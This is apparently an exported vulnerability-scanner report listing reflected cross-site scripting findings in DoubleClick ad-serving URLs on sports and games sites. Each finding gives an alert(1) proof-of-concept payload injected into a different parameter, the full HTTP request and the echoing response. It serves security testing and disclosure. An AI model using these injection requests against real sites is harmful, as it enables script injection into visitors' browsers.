ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 00/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb3bf"-alert(1)-"51781714db8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 64997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/ht ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257ed"-alert(1)-"07d6b0a1c33 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlCl ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1502"-alert(1)-"5e7d2cb2fac was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 94441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011. ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e515"-alert(1)-"3d7d685553c was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; v ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5b4"-alert(1)-"68037134f06 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... c%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid= ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a341"-alert(1)-"39b94f25674 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... t/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmo ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eff5"-alert(1)-"d2ad32e2576 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f109"-alert(1)-"4d12fd2ad5e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... leclick.net/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8539"-alert(1)-"17e7812c6e was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... &cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e22b"-alert(1)-"4bbc9e4800b was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... g.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallows ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4856"-alert(1)-"43dc123b662 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... doubleclick.net/click%3Bh%3Dv8/3af6/17/127/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=5 ...[SNIP]...
